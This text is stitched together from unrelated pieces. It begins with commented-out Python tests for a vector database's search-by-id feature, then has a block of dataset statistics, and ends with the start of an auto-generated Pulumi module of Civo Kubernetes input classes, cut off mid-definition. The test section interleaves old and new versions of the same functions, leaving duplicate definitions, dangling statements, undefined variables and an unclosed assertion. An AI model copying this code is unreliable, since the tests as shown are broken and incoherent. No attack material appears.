# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, query_id, params={})
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert self.check_no_result(result[0])
# # ------------------------------------------------------------- l2, add manual flush, delete, search ------------------------------------------------------------- #
# # ids, manual flush, search collection, exist
# def test_search_index_l2(self, connect, collection, get_simple_index):
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert self.check_no_result(result[0])
#
# # ------------------------------------------------------------- l2, add manual flush, delete, search ------------------------------------------------------------- #
# # ids, manual flush, search collection, exist
# def test_search_index_l2(self, connect, collection, get_simple_index_params):
# '''
# target: test basic search fuction, all the search params is corrent, test all index params, and build
# method: search with the given vectors, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], ids[0])
# # ids, manual flush, search collection, non exist
# def test_search_index_l2_id_not_existed(self, connect, collection, get_simple_index):
#
# # ids, manual flush, search collection, non exist
# def test_search_index_l2_id_not_existed(self, connect, collection, get_simple_index_params):
# '''
# target: test basic search fuction, all the search params is corrent, test all index params, and build
# method: search with the given vectors, check the result
# expected: search status ok, and the length of the result is top_k
# '''
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# # ids, manual flush, delete, manual flush, search collection, exist
# def test_search_index_delete(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# status = self.delete_data_and_flush(connect, collection, [query_id])
# assert status.OK()
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert self.check_no_result(result[0])
# # ids, manual flush, delete, manual flush, search collection, non exist
# def test_search_index_delete_id_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
#
# # ids, manual flush, delete, manual flush, search collection, exist
# def test_search_index_delete(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_and_flush(connect, collection, [query_id])
# assert status.OK()
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert self.check_no_result(result[0])
#
# # ids, manual flush, delete, manual flush, search collection, non exist
# def test_search_index_delete_id_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_and_flush(connect, collection, [query_id])
# assert status.OK()
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert self.check_no_result(result[0])
# def test_search_index_delete_no_flush(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert check_result(result[0], query_id)
# # ids, manual flush, delete, no flush, search collection, non exist
# def test_search_index_delete_no_flush_id_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert self.check_no_result(result[0])
#
# def test_search_index_delete_no_flush(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert check_result(result[0], query_id)
#
# # ids, manual flush, delete, no flush, search collection, non exist
# def test_search_index_delete_no_flush_id_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# assert status.OK()
# assert self.check_no_result(result[0])
# def test_search_index_delete_add(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert self.check_no_result(result[0])
#
# def test_search_index_delete_add(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# vectors, ids = self.init_data_and_flush_ids(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# vectors, new_ids = self.add_data_and_flush_ids(connect, collection, vectors)
# status = connect.create_index(collection, index_type, index_param)
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# status = connect.create_index(collection, index_params)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert result[0][0].distance <= epsilon
# assert check_result(result[0], query_id)
# status = self.delete_data_no_flush(connect, collection, [query_id])
# assert status.OK()
# # add to collection, auto flush, search collection, search partition exist
# def test_search_l2_index_partition(self, connect, collection, get_simple_index):
#
# # add to collection, auto flush, search collection, search partition exist
# def test_search_l2_index_partition(self, connect, collection, get_simple_index_params):
# '''
# target: test basic search fuction, all the search params is corrent, test all index params, and build
# method: add vectors into collection, search with the given vectors, check the result
# expected: search status ok, and the length of the result is top_k, search collection with partition tag return empty
# '''
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, params=search_param)
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag], params=search_param)
# assert status.OK()
# assert len(result) == 0
# # add to partition, auto flush, search partition exist
# def test_search_l2_index_params_partition_2(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag], params=search_param)
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], query_id)
# def test_search_l2_index_partition_id_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag], params=search_param)
# assert status.OK()
# assert len(result) == 0
# # add to collection, manual flush, search non-existing partition non exist
# def test_search_l2_index_partition_tag_not_existed(self, connect, collection, get_simple_index):
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition_and_flush(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = non_exist_id
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=['non_existing_tag'], params=search_param)
# assert status.OK()
# assert len(result) == 0
# def test_search_l2_index_partitions(self, connect, collection, get_simple_index):
# new_tag = "new_tag"
# index_param = get_simple_index["index_param"]
# index_type = get_simple_index["index_type"]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag])
# assert status.OK()
# assert len(result) == 0
#
# # add to partition, auto flush, search partition exist
# def test_search_l2_index_params_partition_2(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag])
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], query_id)
#
# def test_search_l2_index_partition_id_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data(connect, collection, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag])
# assert status.OK()
# assert len(result) == 0
#
# # add to collection, manual flush, search non-existing partition non exist
# def test_search_l2_index_partition_tag_not_existed(self, connect, collection, get_simple_index_params):
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# vectors, ids = self.init_data_partition_and_flush(connect, collection, tag, nb=small_size)
# status = connect.create_index(collection, index_params)
# query_id = non_exist_id
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=['non_existing_tag'])
# assert status.OK()
# assert len(result) == 0
#
# def test_search_l2_index_partitions(self, connect, collection, get_simple_index_params):
# new_tag = "new_tag"
# index_params = get_simple_index_params
# status = connect.create_partition(collection, tag)
# status = connect.create_partition(collection, new_tag)
# vectors, ids = self.init_data_partition_and_flush(connect, collection, tag, nb=small_size)
# vectors, new_ids = self.init_data_partition_and_flush(connect, collection, new_tag, nb=small_size)
# status = connect.create_index(collection, index_type, index_param)
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag, new_tag], search_param)
# status = connect.create_index(collection, index_params)
# query_id = ids[0]
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag, new_tag])
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# query_id = new_ids[0]
# status, result = connect.search_by_id(collection, top_k, query_id, partition_tags=[tag, new_tag], search_param)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id, partition_tag_array=[tag, new_tag])
# assert status.OK()
# assert len(result[0]) == min(len(vectors), top_k)
# assert check_result(result[0], new_ids[0])
# assert result[0][0].distance <= epsilon
# @pytest.mark.level(2)
# def test_search_by_id_without_connect(self, dis_connect, collection):
# '''
# target: test search vectors without connection
# method: use dis connected instance, call search method and check if search successfully
# expected: raise exception
# '''
# query_idtors = 123
# with pytest.raises(Exception) as e:
# status, ids = dis_connect.search_by_id(collection, top_k, query_idtors, params={})
# status, ids = dis_connect.search_by_id(collection, top_k, nprobe, query_idtors)
#
# def test_search_collection_name_not_existed(self, connect, collection):
# '''
# target: search collection not existed
# method: search with the random collection_name, which is not in db
# expected: status not ok
# '''
# collection_name = gen_unique_str("not_existed_collection")
# query_id = non_exist_id
# status, result = connect.search_by_id(collection_name, top_k, query_id, params={})
# assert not status.OK()
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id)
# assert not status.OK()
# def test_search_collection_name_None(self, connect, collection):
# '''
# target: search collection that collection name is None
# method: search with the collection_name: None
# expected: status not ok
# '''
# collection_name = None
# query_ids = non_exist_id
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection_name, top_k, query_id, params={})
# def test_search_jac(self, connect, jac_collection, get_jaccard_index):
# index_param = get_jaccard_index["index_param"]
# index_type = get_jaccard_index["index_type"]
# vectors, ids = self.init_data_binary(connect, jac_collection)
# status = connect.create_index(jac_collection, index_type, index_param)
# assert status.OK()
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(jac_collection, top_k, query_id, params=search_param)
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id)
#
# def test_search_jac(self, connect, jac_collection, get_jaccard_index_params):
# index_params = get_jaccard_index_params
# vectors, ids = self.init_data_binary(connect, jac_collection)
# status = connect.create_index(jac_collection, index_params)
# assert status.OK()
# query_id = ids[0]
# status, result = connect.search_by_id(jac_collection, top_k, nprobe, query_id)
# logging.getLogger().info(status)
# logging.getLogger().info(result)
# assert status.OK()
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# def test_search_ham(self, connect, ham_collection, get_hamming_index):
# index_param = get_hamming_index["index_param"]
# index_param = get_hamming_index["index_type"]
# vectors, ids = self.init_data_binary(connect, ham_collection)
# status = connect.create_index(ham_collection, index_type, index_param)
# assert status.OK()
# query_id = ids[0]
# search_param = get_search_param(index_type)
# status, result = connect.search_by_id(ham_collection, top_k, query_id, params=search_param)
#
# def test_search_ham(self, connect, ham_collection, get_hamming_index_params):
# index_params = get_hamming_index_params
# vectors, ids = self.init_data_binary(connect, ham_collection)
# status = connect.create_index(ham_collection, index_params)
# assert status.OK()
# query_id = ids[0]
# status, result = connect.search_by_id(ham_collection, top_k, nprobe, query_id)
# logging.getLogger().info(status)
# logging.getLogger().info(result)
# assert status.OK()
# assert check_result(result[0], ids[0])
# assert result[0][0].distance <= epsilon
# """
# ******************************************************************
# # The following cases are used to test `search_by_id` function
# # with invalid collection_name top-k / nprobe / query_range
# ******************************************************************
# """
# class TestSearchParamsInvalid(object):
# nlist = 16384
# index_type = IndexType.IVF_SQ8
# index_param = {"nlist": nlist}
#
# class TestSearchParamsInvalid(object):
# nlist = 16384
# index_param = {"index_type": IndexType.IVF_SQ8, "nlist": nlist}
#
# """
# Test search collection with invalid collection names
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_collection_names()
# )
# def get_collection_name(self, request):
# yield request.param
# @pytest.mark.level(2)
# def test_search_with_invalid_collectionname(self, connect, get_collection_name):
# collection_name = get_collection_name
# query_id = non_exist_id
# status, result = connect.search_by_id(collection_name, top_k, query_id)
# assert not status.OK(
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id)
# assert not status.OK()
#
# @pytest.mark.level(1)
# def test_search_with_invalid_tag_format(self, connect, collection):
# query_id = non_exist_id
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection_name, top_k, query_id, partition_tags="tag")
# status, result = connect.search_by_id(collection_name, top_k, nprobe, query_id, partition_tag_array="tag")
#
# """
# Test search collection with invalid top-k
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_top_ks()
# )
# def get_top_k(self, request):
# yield request.param
# @pytest.mark.level(1)
# def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
# top_k = get_top_k
# query_id = non_exist_id
# if isinstance(top_k, int):
# status, result = connect.search_by_id(collection, top_k, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, query_id)
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
#
# @pytest.mark.level(2)
# def test_search_with_invalid_top_k_ip(self, connect, ip_collection, get_top_k):
# top_k = get_top_k
# query_id = non_exist_id
# if isinstance(top_k, int):
# status, result = connect.search_by_id(ip_collection, top_k, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, query_id)
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
#
# """
# Test search collection with invalid nprobe
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_nprobes()
# )
# def get_nprobes(self, request):
# yield request.param
# @pytest.mark.level(1)
# def test_search_with_invalid_nprobe(self, connect, collection, get_nprobes):
# nprobe = get_nprobes
# logging.getLogger().info(nprobe)
# query_id = non_exist_id
# if isinstance(nprobe, int):
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# @pytest.mark.level(2)
# def test_search_with_invalid_nprobe_ip(self, connect, ip_collection, get_nprobes):
# '''
# target: test search fuction, with the wrong top_k
# method: search with top_k
# expected: raise an error, and the connection is normal
# '''
# nprobe = get_nprobes
# logging.getLogger().info(nprobe)
# query_id = non_exist_id
# if isinstance(nprobe, int):
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# assert not status.OK()
# else:
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# """
# Test search collection with invalid ids
# """
# @pytest.fixture(
# scope="function",
# params=gen_invalid_vector_ids()
# )
# def get_vector_ids(self, request):
# yield request.param
# @pytest.mark.level(1)
# def test_search_flat_with_invalid_vector_id(self, connect, collection, get_vector_ids):
# '''
# target: test search fuction, with the wrong query_range
# method: search with query_range
# expected: raise an error, and the connection is normal
# '''
# query_id = get_vector_ids
# logging.getLogger().info(query_id)
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(collection, top_k, nprobe, query_id)
# @pytest.mark.level(2)
# def test_search_flat_with_invalid_vector_id_ip(self, connect, ip_collection, get_vector_ids):
# query_id = get_vector_ids
# logging.getLogger().info(query_id)
# with pytest.raises(Exception) as e:
# status, result = connect.search_by_id(ip_collection, top_k, nprobe, query_id)
# def check_result(result, id):
# if len(result) >= 5:
# return id in [x.id for x in result[:5]]
# else:
# return id in (i.id for i in result)
| 47.001095
| 170
| 0.643759
| 5,386
| 42,912
| 4.842369
| 0.039361
| 0.032476
| 0.026073
| 0.04302
| 0.923009
| 0.90311
| 0.877459
| 0.860588
| 0.847245
| 0.826502
| 0
| 0.007875
| 0.242473
| 42,912
| 912
| 171
| 47.052632
| 0.794444
| 0.957401
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ecff11867b45d843837a87ea937c5cb00a3952f9
| 30,134
|
py
|
Python
|
sdk/python/pulumi_civo/_inputs.py
|
dirien/pulumi-civo
|
f75eb1482bade0d21fb25c9e20e6838791518226
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-04T12:27:02.000Z
|
2022-03-14T13:16:43.000Z
|
sdk/python/pulumi_civo/_inputs.py
|
dirien/pulumi-civo
|
f75eb1482bade0d21fb25c9e20e6838791518226
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2020-08-17T19:03:57.000Z
|
2022-03-25T19:17:57.000Z
|
sdk/python/pulumi_civo/_inputs.py
|
dirien/pulumi-civo
|
f75eb1482bade0d21fb25c9e20e6838791518226
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2020-08-04T12:27:03.000Z
|
2022-03-24T00:56:24.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'KubernetesClusterInstalledApplicationArgs',
'KubernetesClusterInstanceArgs',
'KubernetesClusterPoolArgs',
'KubernetesClusterPoolInstanceArgs',
'LoadBalancerBackendArgs',
'GetInstancesFilterArgs',
'GetInstancesSizeFilterArgs',
'GetInstancesSizeSortArgs',
'GetInstancesSortArgs',
'GetKubernetesVersionFilterArgs',
'GetKubernetesVersionSortArgs',
'GetRegionFilterArgs',
'GetRegionSortArgs',
'GetTemplateFilterArgs',
'GetTemplateSortArgs',
]
@pulumi.input_type
class KubernetesClusterInstalledApplicationArgs:
def __init__(__self__, *,
application: Optional[pulumi.Input[str]] = None,
category: Optional[pulumi.Input[str]] = None,
installed: Optional[pulumi.Input[bool]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] application: The name of the application
:param pulumi.Input[str] category: The category of the application
:param pulumi.Input[bool] installed: if installed or not
:param pulumi.Input[str] version: The version of the application
"""
if application is not None:
pulumi.set(__self__, "application", application)
if category is not None:
pulumi.set(__self__, "category", category)
if installed is not None:
pulumi.set(__self__, "installed", installed)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def application(self) -> Optional[pulumi.Input[str]]:
"""
The name of the application
"""
return pulumi.get(self, "application")
@application.setter
def application(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
"""
The category of the application
"""
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def installed(self) -> Optional[pulumi.Input[bool]]:
"""
if installed or not
"""
return pulumi.get(self, "installed")
@installed.setter
def installed(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "installed", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
The version of the application
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class KubernetesClusterInstanceArgs:
def __init__(__self__, *,
cpu_cores: Optional[pulumi.Input[int]] = None,
disk_gb: Optional[pulumi.Input[int]] = None,
hostname: Optional[pulumi.Input[str]] = None,
ram_mb: Optional[pulumi.Input[int]] = None,
size: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] cpu_cores: Total cpu of the inatance.
:param pulumi.Input[int] disk_gb: The size of the disk.
:param pulumi.Input[str] hostname: The hostname of the instance.
:param pulumi.Input[int] ram_mb: Total ram of the instance
:param pulumi.Input[str] size: The size of the instance.
:param pulumi.Input[str] status: The status of Kubernetes cluster.
* `ready` -If the Kubernetes cluster is ready.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A space separated list of tags, to be used freely as required.
"""
if cpu_cores is not None:
pulumi.set(__self__, "cpu_cores", cpu_cores)
if disk_gb is not None:
pulumi.set(__self__, "disk_gb", disk_gb)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if ram_mb is not None:
pulumi.set(__self__, "ram_mb", ram_mb)
if size is not None:
pulumi.set(__self__, "size", size)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="cpuCores")
def cpu_cores(self) -> Optional[pulumi.Input[int]]:
"""
Total cpu of the inatance.
"""
return pulumi.get(self, "cpu_cores")
@cpu_cores.setter
def cpu_cores(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_cores", value)
@property
@pulumi.getter(name="diskGb")
def disk_gb(self) -> Optional[pulumi.Input[int]]:
"""
The size of the disk.
"""
return pulumi.get(self, "disk_gb")
@disk_gb.setter
def disk_gb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "disk_gb", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
The hostname of the instance.
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter(name="ramMb")
def ram_mb(self) -> Optional[pulumi.Input[int]]:
"""
Total ram of the instance
"""
return pulumi.get(self, "ram_mb")
@ram_mb.setter
def ram_mb(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ram_mb", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of the instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of Kubernetes cluster.
* `ready` -If the Kubernetes cluster is ready.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A space separated list of tags, to be used freely as required.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class KubernetesClusterPoolArgs:
def __init__(__self__, *,
count: Optional[pulumi.Input[int]] = None,
id: Optional[pulumi.Input[str]] = None,
instance_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
instances: Optional[pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]]] = None,
size: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] count: The size of the pool
:param pulumi.Input[str] id: The ID of the pool
:param pulumi.Input[Sequence[pulumi.Input[str]]] instance_names: A list of the instance in the pool
:param pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]] instances: A list of instance inside the pool
:param pulumi.Input[str] size: The size of the instance.
"""
if count is not None:
pulumi.set(__self__, "count", count)
if id is not None:
pulumi.set(__self__, "id", id)
if instance_names is not None:
pulumi.set(__self__, "instance_names", instance_names)
if instances is not None:
pulumi.set(__self__, "instances", instances)
if size is not None:
pulumi.set(__self__, "size", size)
@property
@pulumi.getter
def count(self) -> Optional[pulumi.Input[int]]:
"""
The size of the pool
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "count", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the pool
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="instanceNames")
def instance_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the instance in the pool
"""
return pulumi.get(self, "instance_names")
@instance_names.setter
def instance_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "instance_names", value)
@property
@pulumi.getter
def instances(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]]]:
"""
A list of instance inside the pool
"""
return pulumi.get(self, "instances")
@instances.setter
def instances(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['KubernetesClusterPoolInstanceArgs']]]]):
pulumi.set(self, "instances", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of the instance.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@pulumi.input_type
class KubernetesClusterPoolInstanceArgs:
def __init__(__self__, *,
cpu_cores: Optional[pulumi.Input[int]] = None,
disk_gb: Optional[pulumi.Input[int]] = None,
hostname: Optional[pulumi.Input[str]] = None,
ram_mb: Optional[pulumi.Input[int]] = None,
